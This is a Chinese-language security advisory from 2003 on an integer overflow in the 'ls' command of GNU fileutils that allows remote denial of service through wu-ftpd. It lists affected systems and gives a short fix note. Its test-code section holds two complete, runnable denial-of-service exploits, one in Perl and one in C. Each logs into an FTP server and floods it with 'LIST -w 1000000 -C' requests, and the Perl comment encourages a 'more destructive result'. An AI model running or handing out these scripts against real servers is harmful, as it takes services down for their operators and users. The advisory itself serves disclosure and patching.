发布时间:2003-10-22
更新时间:2003-11-03
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8875
受影响系统 GNU fileutils 4.0
+Debian Linux 2.2 68k
+Debian Linux 2.2 alpha
+Debian Linux 2.2 arm
+Debian Linux 2.2 IA-32
+Debian Linux 2.2 powerpc
+Debian Linux 2.2 sparc
+Immunix Immunix OS 7+
+RedHat Linux 6.2
+RedHat Linux 6.2 i386
+RedHat Linux 7.0
+RedHat Linux 7.0 i386
+Slackware Linux 7.0
+Slackware Linux 7.1
GNU fileutils 4.0.36
+RedHat Linux 7.1
+RedHat Linux 7.1 i386
+RedHat Linux for iSeries 7.1
+RedHat Linux for pSeries 7.1
GNU fileutils 4.1
+Caldera OpenLinux Server 3.1
+Caldera OpenLinux Server 3.1.1
+Caldera OpenLinux Workstation 3.1
+Caldera OpenLinux Workstation 3.1.1
+RedHat Linux 7.2
+RedHat Linux 7.2 alpha
+RedHat Linux 7.2 i386
+RedHat Linux 7.2 ia64
+RedHat Linux 7.3
+RedHat Linux 7.3 i386
+S.u.S.E. Linux 7.0 alpha
+S.u.S.E. Linux 7.0 i386
+S.u.S.E. Linux 7.0 ppc
+S.u.S.E. Linux 7.0 sparc
+S.u.S.E. Linux 7.1 alpha
+S.u.S.E. Linux 7.1 ppc
+S.u.S.E. Linux 7.1 sparc
+S.u.S.E. Linux 7.1 x86
+S.u.S.E. Linux 7.2 i386
+S.u.S.E. Linux 7.3 i386
+S.u.S.E. Linux 7.3 ppc
+S.u.S.E. Linux 7.3 sparc
+Slackware Linux 8.0
+Sun Cobalt Qube 3
+Sun Cobalt RaQ 4
+Sun Cobalt RaQ 550
+Sun Cobalt RaQ XTR
+Sun Linux 5.0
+Sun Linux 5.0.3
+Sun Linux 5.0.5
+Sun Linux 5.0.6
+Sun LX50
+Trustix Secure Linux 1.1
+Trustix Secure Linux 1.2
+Trustix Secure Linux 1.5
GNU fileutils 4.1.6
+Sun Linux 5.0.6
GNU fileutils 4.1.7
Washington University wu-ftpd 2.4.1
Washington University wu-ftpd 2.4.2 academ[BETA1-15
+Caldera OpenLinux Standard 1.2
Washington University wu-ftpd 2.4.2 academ[BETA-18]
+RedHat Linux 5.2 i386
Washington University wu-ftpd 2.4.2 VR17
Washington University wu-ftpd 2.4.2 VR16
Washington University wu-ftpd 2.4.2 (beta 18) VR9
Washington University wu-ftpd 2.4.2 (beta 18) VR8
Washington University wu-ftpd 2.4.2 (beta 18) VR7
Washington University wu-ftpd 2.4.2 (beta 18) VR6
Washington University wu-ftpd 2.4.2 (beta 18) VR5
Washington University wu-ftpd 2.4.2 (beta 18) VR4
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.5 .0
+Caldera OpenLinux 2.4
+Caldera OpenLinux Desktop 2.3
+RedHat Linux 6.0
+RedHat Linux 6.0 alpha
+RedHat Linux 6.0 sparc
+SCO eDesktop 2.4
+SCO eServer 2.3
+SCO eServer 2.3.1
Washington University wu-ftpd 2.6 .0
+Cobalt Qube 1.0
+Conectiva Linux 4.0
+Conectiva Linux 4.0 es
+Conectiva Linux 4.1
+Conectiva Linux 4.2
+Conectiva Linux 5.0
+Conectiva Linux 5.1
+Debian Linux 2.2
+Debian Linux 2.2 68k
+Debian Linux 2.2 alpha
+Debian Linux 2.2 arm
+Debian Linux 2.2 powerpc
+Debian Linux 2.2 sparc
-FreeBSD FreeBSD 4.3
-FreeBSD FreeBSD 4.3 -RELEASE
-FreeBSD FreeBSD 4.3 -STABLE
-FreeBSD FreeBSD 4.4
+HP HP-UX 11.0
+HP HP-UX 11.11
+RedHat Linux 5.2 alpha
+RedHat Linux 5.2 i386
+RedHat Linux 5.2 sparc
+RedHat Linux 6.0
+RedHat Linux 6.0 alpha
+RedHat Linux 6.0 sparc
+RedHat Linux 6.1 alpha
+RedHat Linux 6.1 i386
+RedHat Linux 6.1 sparc
+RedHat Linux 6.2 alpha
+RedHat Linux 6.2 i386
+RedHat Linux 6.2 sparc
+S.u.S.E. Linux 6.1
+S.u.S.E. Linux 6.1 alpha
+S.u.S.E. Linux 6.2
+S.u.S.E. Linux 6.3
+S.u.S.E. Linux 6.3 alpha
+S.u.S.E. Linux 6.3 ppc
+S.u.S.E. Linux 6.4
+S.u.S.E. Linux 6.4 alpha
+S.u.S.E. Linux 6.4 ppc
+S.u.S.E. Linux 7.0 alpha
+S.u.S.E. Linux 7.0 i386
+S.u.S.E. Linux 7.0 ppc
+S.u.S.E. Linux 7.0 sparc
+S.u.S.E. Linux 7.1 alpha
+S.u.S.E. Linux 7.1 ppc
+S.u.S.E. Linux 7.1 sparc
+S.u.S.E. Linux 7.1 x86
+S.u.S.E. Linux 7.2 i386
+S.u.S.E. Linux 7.3 i386
+S.u.S.E. Linux 7.3 ppc
+S.u.S.E. Linux 7.3 sparc
+TurboLinux Turbo Linux 4.0
+Wirex Immunix OS 6.2
Washington University wu-ftpd 2.6.1
+Caldera OpenLinux 2.3
+Caldera OpenLinux Server 3.1
+Cobalt Qube 1.0
+Conectiva Linux 6.0
+Conectiva Linux 7.0
+Conectiva Linux 8.0
-FreeBSD FreeBSD 4.3
-FreeBSD FreeBSD 4.3 -RELEASE
-FreeBSD FreeBSD 4.3 -STABLE
-FreeBSD FreeBSD 4.4
-FreeBSD FreeBSD 5.0
-FreeBSD FreeBSD 5.0 alpha
+MandrakeSoft Corporate Server 1.0.1
+MandrakeSoft Linux Mandrake 6.0
+MandrakeSoft Linux Mandrake 6.1
+MandrakeSoft Linux Mandrake 7.0
+MandrakeSoft Linux Mandrake 7.1
+MandrakeSoft Linux Mandrake 7.2
+MandrakeSoft Linux Mandrake 8.0
+MandrakeSoft Linux Mandrake 8.0 ppc
+MandrakeSoft Linux Mandrake 8.1
+RedHat Linux 7.0 alpha
+RedHat Linux 7.0 i386
+RedHat Linux 7.0 sparc
+RedHat Linux 7.1 alpha
+RedHat Linux 7.1 i386
+RedHat Linux 7.1 i586
+RedHat Linux 7.1 i686
+RedHat Linux 7.1 ia64
+RedHat Linux 7.1 noarch
+RedHat Linux 7.2 alpha
+RedHat Linux 7.2 athlon
+RedHat Linux 7.2 i386
+RedHat Linux 7.2 i586
+RedHat Linux 7.2 i686
+RedHat Linux 7.2 ia64
+RedHat Linux 7.2 noarch
-S.u.S.E. Linux 7.0
-S.u.S.E. Linux 7.0 alpha
-S.u.S.E. Linux 7.0 ppc
-S.u.S.E. Linux 7.0 sparc
-S.u.S.E. Linux 7.1
-S.u.S.E. Linux 7.1 alpha
-S.u.S.E. Linux 7.1 ppc
-S.u.S.E. Linux 7.1 sparc
-S.u.S.E. Linux 7.1 x86
-S.u.S.E. Linux 7.2
-S.u.S.E. Linux 7.3
+SCO eDesktop 2.4
+SCO eServer 2.3.1
+SCO Open Server 5.0
+SCO Open Server 5.0.1
+SCO Open Server 5.0.2
+SCO Open Server 5.0.3
+SCO Open Server 5.0.4
+SCO Open Server 5.0.5
+SCO Open Server 5.0.6
+SCO Open Server 5.0.6 a
-Slackware Linux 7.0
-Slackware Linux 7.1
-Slackware Linux 8.0
+TurboLinux TL Workstation 6.1
+TurboLinux Turbo Linux 6.0
+TurboLinux Turbo Linux 6.0.1
+TurboLinux Turbo Linux 6.0.2
+TurboLinux Turbo Linux 6.0.3
+TurboLinux Turbo Linux 6.0.4
+TurboLinux Turbo Linux 6.0.5
+Wirex Immunix OS 7+
+Wirex Immunix OS 7.0
+Wirex Immunix OS 7.0 -Beta
Washington University wu-ftpd 2.6.2
+Compaq Tru64 4.0 b
+Compaq Tru64 4.0 d
+Compaq Tru64 4.0 d PK9 (BL17)
+Compaq Tru64 4.0 e
+Compaq Tru64 4.0 f
+Compaq Tru64 4.0 f PK6 (BL17)
+Compaq Tru64 4.0 f PK7 (BL18)
+Compaq Tru64 4.0 g
+Compaq Tru64 4.0 g PK3 (BL17)
+Compaq Tru64 5.0
+Compaq Tru64 5.0 PK4 (BL17)
+Compaq Tru64 5.0 PK4 (BL18)
+Compaq Tru64 5.0 a
+Compaq Tru64 5.0 a PK3 (BL17)
+Compaq Tru64 5.0 f
+Compaq Tru64 5.1
+Compaq Tru64 5.1 PK3 (BL17)
+Compaq Tru64 5.1 PK4 (BL18)
+Compaq Tru64 5.1 PK5 (BL19)
+Compaq Tru64 5.1 PK6 (BL20)
+Compaq Tru64 5.1 a
+Compaq Tru64 5.1 a PK1 (BL1)
+Compaq Tru64 5.1 a PK2 (BL2)
+Compaq Tru64 5.1 a PK3 (BL3)
+Compaq Tru64 5.1 a PK4 (BL21)
+Compaq Tru64 5.1 a PK5 (BL23)
+Compaq Tru64 5.1 b
+Compaq Tru64 5.1 b PK1 (BL1)
+Compaq Tru64 5.1 b PK2 (BL22)
+Conectiva Linux 9.0
+Debian Linux 3.0
+Debian Linux 3.0 alpha
+Debian Linux 3.0 arm
+Debian Linux 3.0 hppa
+Debian Linux 3.0 ia-32
+Debian Linux 3.0 ia-64
+Debian Linux 3.0 m68k
+Debian Linux 3.0 mips
+Debian Linux 3.0 mipsel
+Debian Linux 3.0 ppc
+Debian Linux 3.0 s/390
+Debian Linux 3.0 sparc
+MandrakeSoft Linux Mandrake 8.2
+MandrakeSoft Linux Mandrake 8.2 ppc
+Sun Linux 5.0.7
Washington University wu-ftpd 2.6.2
+TurboLinux TL Advanced Server 6.0
+TurboLinux TL Server 6.1
+TurboLinux TL Workstation 6.0
详细描述
Coreutils 'ls'命令实现上存在整数溢出问题
,当程序处理宽度和列数命令行参数时存在
漏洞,当处理超长的参数时会导致整数溢出,溢出后的整数值可能使程序发生非预期的行为
。其他调用'ls'命令的软件可能因此导致拒绝服务攻击
。
测试代码
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)
print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!\n";
$ftp->quit;
/*
*
*
http://www.rosiello.org
* (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail : angelo@rosiello.org
* URL :
http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
void addr_initialize( );
void usage( );
int main( int argc, char **argv )
{
int i, sd, PORT, loop, error;
char user[30], password[30], ch;
struct sockaddr_in server_addr;
fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
fprintf( stdout, "
http://www.rosiello.org\n" );
fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
if( argc != 6 ) usage( argv[0] );
if( strlen( argv[3] ) > 20 ) exit( 0 );
if( strlen( argv[4] ) > 20 ) exit( 0 );
sprintf( user, "USER %s\n", argv[3] );
sprintf( password, "PASS %s\n", argv[4] );
PORT = atoi( argv[2] );
loop = atoi( argv[5] );
addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
sd = socket( AF_INET, SOCK_STREAM, 0 );
error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
if( error != 0 )
{
perror( "Something wrong with the connection" );
exit( 0 );
}
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
ch = '\0';
printf( "Connection executed, now waiting to log in...\n" );
printf( "%s", user );
send( sd, user, strlen( user ), 0 );
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "%s", password );
ch = '\0';
send( sd, password, strlen( password ), 0 );
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "Sending the DoS query\n" );
for( i=0; i<loop; i++ )
{
write( sd, "LIST -w 1000000 -C\n", 19 );
}
printf( "All done\n" );
close( sd );
return 0;
}
void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
address -> sin_family = AF_INET;
address -> sin_port = htons((u_short)port);
address -> sin_addr.s_addr = IPaddr;
}
void usage( char *program )
{
fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
exit(0);
}
解决方案
各厂商已经在最新版本的fileutils软件包中修补了此
漏洞。
相关信息
WU-FTPD 2.6.2 Freezer
http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html